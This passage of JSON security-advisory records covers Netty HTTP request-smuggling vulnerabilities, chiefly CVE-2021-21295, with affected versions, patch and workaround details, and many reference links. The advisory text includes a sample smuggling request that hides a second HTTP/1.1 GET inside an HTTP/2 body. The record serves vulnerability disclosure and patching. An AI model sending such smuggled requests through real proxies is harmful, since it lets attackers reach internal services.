"https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:25Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-wm47-8v5p-wjpj", "published": "2021-03-09T18:49:49Z", "modified": "2025-01-14T08:57:03.544654Z", "aliases": [ "BIT-zookeeper-2021-21295", "CVE-2021-21295" ], "related": [ "CGA-3q34-9hpp-p3gf", "CGA-xh32-h668-455p", "CVE-2021-21295", "CVE-2021-21409" ], "summary": "Possible request smuggling in HTTP/2 due missing validation", "details": "### Impact\nIf a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1.\nIf the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. \n\nIn a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked.\n\nAn attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. A sample attack request looks like:\n\n```\nPOST / HTTP/2\n:authority:: externaldomain.com\nContent-Length: 4\n\nasdfGET /evilRedirect HTTP/1.1\nHost: internaldomain.com\n```\n\nUsers are only affected if all of this is `true`:\n * `HTTP2MultiplexCodec` or `Http2FrameCodec` is used\n * `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects\n * These HTTP/1.1 objects are forwarded to another remote peer.\n \n\n### Patches\nThis has been patched in 4.1.60.Final\n\n### Workarounds\nThe user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.\n\n### References\nRelated change to workaround the problem: https://github.com/Netflix/zuul/pull/980 ", "affected": [ { "package": { "name": "io.netty:netty-codec-http2", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.60.Final" } ] } ], "versions": [ "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295" }, { "type": "WEB", "url": "https://github.com/Netflix/zuul/pull/980" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc165e36ca7cb5417aec3f21bbc4ec00fb38ecebdd96a82cfab9bd56f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbed09768f496244a2e138dbbe6d2847ddf796c9c8ef9e50f2e3e30d9@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbadcbcb50195f00bbd196403865ced521ca70787999583c07be38d0e@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb95d42ce220ed4a4683aa17833b5006d657bc4254bc5cb03cd5e6bfb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra83096bcbfe6e1f4d54449f8a013117a0536404e9d307ab4a0d34f81@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96ce18044880c33634c4b3fcecc57b8b90673c9364d63eba00385523@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r905b92099998291956eebf4f1c5d95f5a0cbcece2946cc46d32274fd@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9051e4f484a970b5566dc1870ecd9c1eb435214e2652cf3ea4d0c0cc@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210604-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re6207ebe2ca4d44f2a6deee695ad6f27fd29d78980f1d46ed1574f91@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc096e13ac4501ea2e2b03a197682a313b85d3d3ec89d5ae5551b384@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfc535afd413d9934d6ee509dce234dac41fa3747a7555befb17447e@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf3752209a8b04996373bf57fdc808b3bfaa2be8702698a0323641f8@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86cd38a825ab2344f3e6cad570528852f29a4ffdf56ab67d75c36edf@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ff9e735ca33612d900607dc139ebd38a64cadc6bce292e53eb86d7f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c4596b9b37f5ae91628ccf169d33cd5a0da4b16b6c39d5bad8e03f3@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c293431c781696681abbfe1c573c2d9dcdae6fd3ff330ea22f0433f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r393a339ab0b63ef9e6502253eeab26e7643b3e69738d5948b2b1d064@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r312ce5bd3c6bf08c138349b507b6f1c25fe9cf40b6f2b0014c9d12b1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27b7e5a588ec826b15f38c40be500c50073400019ce7b8adfd07fece@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r268850f26639ebe249356ed6d8edb54ee8943be6f200f770784fb190@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22b2f34447d71c9a0ad9079b7860323d5584fb9b40eb42668c21eaf1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22adb45fe902aeafcd0a1c4db13984224a667676c323c66db3af38a1@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1bca0b81193b74a451fc6d687ab58ef3a1f5ec40f6c61561d8dd9509@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15f66ada9a5faf4bac69d9e7c4521cedfefa62df9509881603791969@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r040a5e4d9cca2f98354b58a70b27099672276f66995c4e2e39545d0b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r837bbcbf12e335e83ab448b1bd2c1ad7e86efdc14034b23811422e6a@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70cebada51bc6d49138272437d8a28fe971d0197334ef906b575044c@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6aee7e3566cb3e51eeed2fd8786704d91f80a7581e00a787ba9f37f6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a29316d758db628a1df49ca219d64caf493999b52cc77847bfba675@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a122c25e352eb134d01e7f4fc4d345a491c5ee9453fef6fc754d15b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67e6a636cbc1958383a1cd72b7fd0cd7493360b1dd0e6c12f5761798@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5fc5786cdd640b1b0a3c643237ce0011f0a08a296b11c0e2c669022c@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5470456cf1409a99893ae9dd57439799f6dc1a60fda90e11570f66fe@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5232e33a1f3b310a3e083423f736f3925ebdb150844d60ac582809f8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925@%3Ccommits.servicecomb.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-03-09T18:47:09Z", "nvd_published_at": 